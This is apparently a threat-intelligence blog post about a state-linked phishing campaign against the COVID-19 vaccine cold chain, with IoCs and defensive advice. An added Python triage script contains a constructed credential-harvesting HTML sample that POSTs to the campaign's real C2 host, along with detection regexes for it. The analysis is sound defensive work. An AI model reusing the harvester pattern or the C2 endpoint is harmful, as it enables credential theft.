As pharmaceutical companies across the world race towards a vaccine, cybercrime continues to thrive in the underbelly of the Internet. In forums on the dark web, criminals continue to trade enormous repositories of critical medical data gathered through unauthorized means. As COVID-19 continues to dominate headlines, confidential vaccine research data offers cybercriminals ample monetization opportunities. In addition to the COVID-19 databases containing confidential PII being leaked on the Internet, one of the critical security concerns is the immense cold chain logistics operation behind the vaccine.
Recently, IBM warned of cybercriminals targeting the distribution network of COVID-19 vaccines through a campaign believed to have started in September 2020. The activity uncovered by IBM has shed light on a global phishing campaign specifically designed to target members of the Cold Chain Equipment Optimisation Platform (CCEOP), with signs of being state-sponsored. As per a report by the Guardian, organizations across six countries were sent emails containing malicious attachments. These emails purported to be from Haier Biomedical, a UNICEF program member working to strengthen vaccine supply chains. Incidents such as these underline the pressing need for cybersecurity rigour at every stage of the COVID-19 vaccine supply chain.
More recently, Cyble researchers observed additional indicators and emails whose subject poses as a Draft of Contract related to the CCEOP and Vaccine Program. This phishing email masquerades as credible communication from Haier Biomedical and is targeted at Kraeber & Co., as shown in the image below.

On opening the malicious HTML attachment, the user is prompted to submit login credentials in order to view the PDF content, as depicted in the figure below. Our research indicates that a malicious ActiveX component runs automatically in the background as soon as the user enables the document's security control. This type of ‘Precision Targeting’ involves advanced phishing attacks that are difficult for security organizations to detect and take down.

The attached HTML page contains a malicious ActiveX function that sends the harvested credentials to the hacker’s server using a simple POST request, as shown below.

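The following triage check is an added example and not part of Cyble's report or the analysed attachment: it scans an HTML attachment for the pattern described above (a login prompt plus a script that creates an ActiveX HTTP object and POSTs to a hard-coded URL) and compares any POST target against the defanged C2 URL published in the IoC section of this report. The regular expressions, the `triage_html_attachment` and `refang` names and both sample HTML documents are the editor's own constructions.

```python
"""Triage an HTML e-mail attachment for the pattern described above: a login prompt
whose script creates an ActiveX HTTP object and POSTs the fields to an external
server. Added example; the heuristics are the editor's own, not Cyble's."""
import re

# Defanged C2 URL as published in the IoC section of this report.
KNOWN_C2 = ["hxxps://roud3servers[.]tk/next[.]php"]

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
PASSWORD_RE = re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I)
# ActiveX HTTP object creation and an explicit POST to a hard-coded URL.
ACTIVEX_RE = re.compile(
    r"new\s+ActiveXObject\s*\(\s*[\"'](?:Microsoft|MSXML2)\.(?:Server)?XMLHTTP", re.I)
POST_RE = re.compile(r"\.open\s*\(\s*[\"']POST[\"']\s*,\s*[\"']([^\"']+)[\"']", re.I)

def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable URL (hxxp -> http, [.] -> .)."""
    return re.sub(r"^hxxp", "http", ioc).replace("[.]", ".")

def triage_html_attachment(html: str) -> dict:
    """Return findings and a verdict for one HTML attachment."""
    js = "\n".join(SCRIPT_RE.findall(html))
    targets = POST_RE.findall(js)
    known = {refang(u) for u in KNOWN_C2}
    f = {"password_field": bool(PASSWORD_RE.search(html)),
         "activex_http": bool(ACTIVEX_RE.search(js)),
         "post_targets": targets,
         "known_c2_hit": any(t in known for t in targets)}
    # Credential form + ActiveX transport + hard-coded POST target, or a known C2.
    harvester = f["password_field"] and f["activex_http"] and bool(targets)
    f["verdict"] = "malicious" if harvester or f["known_c2_hit"] else "clean"
    return f

# Constructed samples (not the real attachment): the harvesting pattern, and a
# normal same-origin login form that must not be flagged.
SAMPLE_PHISH = """<html><body><form id="f">Email <input name="user" type="text">
Password <input name="pw" type="password"> <input type="button" value="View PDF"></form>
<script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("POST", "https://roud3servers.tk/next.php", false);
</script></body></html>"""
SAMPLE_BENIGN = """<html><body><form method="post" action="/login">
<input name="user" type="text"><input name="pw" type="password"></form></body></html>"""

if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, triage_html_attachment(sample))
```

The same-origin form without ActiveX stays "clean", so the rule keys on the combination the report describes rather than on the mere presence of a password field.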
The victims’ harvested credentials may be used to gain unauthorized access and conduct further cyber espionage. The adversary may use them to access the targeted infrastructure and steal confidential information related to COVID-19 vaccine research and delivery. Such sophisticated phishing campaigns may also lead to further damage, such as data breaches and undetected supply chain attacks.
As countries prepare for the availability and effective distribution of the vaccine in the near future, there is a growing need for cyber defences at every step of the vaccine supply chain. With cyberattacks on the vaccine cold chain emerging from all corners, organizations are expected to ensure they are prepared to address the challenges that may arise.
Furthermore, our researchers noted that the vaccine is now being sold in various darkweb marketplaces. Considering the limited supply of these vaccines, it is expected that they will be traded. It should be noted that the medical and health risks related to any such alleged medicine or vaccine can be dangerous and lethal. We DO NOT recommend that users make any direct or indirect purchases.

Security Measures:
This phishing campaign is a clear indication that threat actors are shifting their focus to the complex logistical network associated with the R&D and distribution of the vaccine value chain. To counter the impact of cyberattacks targeting the COVID-19 vaccine supply chain, here are a few security measures that organizations can adopt:
- Validating third parties and ensuring that they have the necessary level of cyber defences
- Never clicking on unverified/unidentified links
- Refraining from opening email attachments before validating their authenticity
- Using security software and keeping it updated
- Training employees on cybersecurity through cyber literacy programs
- Periodically conducting third-party/supplier risk assessments
Indicators of Compromise (IOCs)

| Indicator type | Value |
| --- | --- |
| SHA256 | 18D368E5EE1BBB9B7311E353CFD5475D772E8DF6C4AA1C79B41800F07059B761 |
| SHA256 | 3F0CA8BF1382ACB68E303F2135ED01C595122927DEF9A40E70C0AA8CBDDF7130 |
| SHA256 | E735ABD2DA75D8782A3828BC31B2C99930058CEBCF73B093D8C7A4139BF06C93 |
| SHA256 | 07DBE854A34E61349ADCC97DD3E2EB5A9158E02568BAE3E2AAE3859AEEB5B8A9 |
| C2 URL | hxxps://roud3servers[.]tk/next[.]php |
About Cyble
Cyble is a global threat intelligence SaaS provider that helps enterprises protect themselves from cybercrimes and exposure in the darkweb. Cyble’s prime focus is to provide organizations with real-time visibility into their digital risk footprint. Backed by Y Combinator as part of the 2021 winter cohort, Cyble has also been recognized by Forbes as one of the top 20 Best Cybersecurity Startups To Watch In 2020. Headquartered in Alpharetta, Georgia, and with offices in Australia, Singapore, and India, Cyble has a global presence. To learn more about Cyble, visit www.cyble.io.